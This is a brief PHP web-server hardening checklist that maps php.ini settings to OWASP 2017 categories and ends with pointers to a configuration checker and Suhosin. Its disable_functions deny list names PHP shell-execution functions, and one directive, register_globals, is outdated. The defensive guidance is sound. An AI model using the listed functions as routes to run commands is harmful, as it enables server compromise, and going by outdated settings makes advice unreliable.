Web Server Hardening - PHP
1. Secure PHP Configuration in php.ini
1.1 OWASP A2:2017 - Broken Authentication
Changing the Session File Pathsession.save_path="C:\xampp\tmp"
1.2 OWASP A3:2017-Sensitive Data Exposure
Error Reporting For Productionerror_reporting=E_ALL
display_errors=Off
log_errors=On
Disable PHP version output
expose_php=Off
1.3 OWASP A5:2017 - Broken Access Control
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CWE-639: Authorization Bypass Through User-Controlled Key
Disable File Includes
allow_url_fopen = Off
allow_url_include = Off
1.4 OWASP A6:2017 - Security Misconfiguration
Disable Unused PHP Functiondisable_functions = system, exec, shell_exec, passthru, phpinfo, show_source, popen, proc_open
Disable Global Variable
register_globals=Off
Restrict File Uploads
file_uploads=Off
upload_tmp_dir="C:\securelocation"
upload_max_filesize=2M
1.5 OWASP A7:2017 - Cross Site Scripting (XSS)
CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag
HTTP Response HTTPOnly and Secure Flag Set
session.cookie_httponly = True
session.cookie_secure = True
2. PHP Configuration Assessment Tool
SektionEins GmbH - PHP Secure Configuration Checkerhttps://github.com/sektioneins/pcc
3. PHP Security Extension
Suhosin
https://suhosin.org/stories/index.htmlReference:
OWASP - PHP Configuration Cheat Sheet *